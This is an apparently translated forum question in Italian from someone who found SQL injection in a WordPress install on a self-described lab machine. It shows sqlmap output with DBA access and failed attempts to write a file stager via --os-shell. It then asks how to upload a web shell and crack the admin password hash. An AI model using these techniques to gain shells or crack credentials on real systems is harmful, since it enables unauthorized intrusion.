Ho trovato una vulnerabilità di SQL injection in un'installazione di Wordpress all'interno di una delle mie macchine di laboratorio e sto cercando di sfruttarla per caricare una shell.
Posso ottenere l'hash dell'amministratore ma sembra che sia piuttosto complesso visto che JTR e HASHCAT impiegano molto tempo senza fortuna.
Ecco l'output di base di SQLmap:
web server operating system: Linux Ubuntu xxxxxxxxx
web application technology: PHP 5.2.6, Apache 2.2.11
back-end DBMS: MySQL 5
[02:24:38] [INFO] testing if current user is DBA
[02:24:38] [INFO] fetching current user
current user is DBA: True
[02:24:38] [INFO] fetching database names
[02:24:38] [INFO] the SQL query used returns 3 entries
[02:24:38] [INFO] resumed: "information_schema","information_schema"
[02:24:38] [INFO] resumed: "mysql","mysql"
[02:24:38] [INFO] resumed: "wordpress","wordpress"
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
Ho provato l'opzione --os-shell
ma sembra che non ci sia accesso in scrittura poiché ottengo questi errori:
[02:26:36] [WARNING] unable to retrieve automatically any web server path
[02:26:36] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[02:26:37] [WARNING] unable to upload the file stager on '/var/www'
[02:26:37] [INFO] trying to upload the file stager on '/var/www' via UNION technique
[02:26:37] [WARNING] expect junk characters inside the file as a leftover from UNION query
[02:26:38] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
Posso ottenere --sql-shell senza problemi. Ho provato i passaggi qui ( link ) per caricare una shell ma ottengo il seguente errore
[02:00:16] [WARNING] execution of custom SQL queries is only available when stacked queries are supported
Ora, ho bisogno di un modo per caricare una shell sul computer di destinazione, qualsiasi idea? Anche eventuali pensieri in cui posso rompere l'hash della password di amministratore di Wordpress online?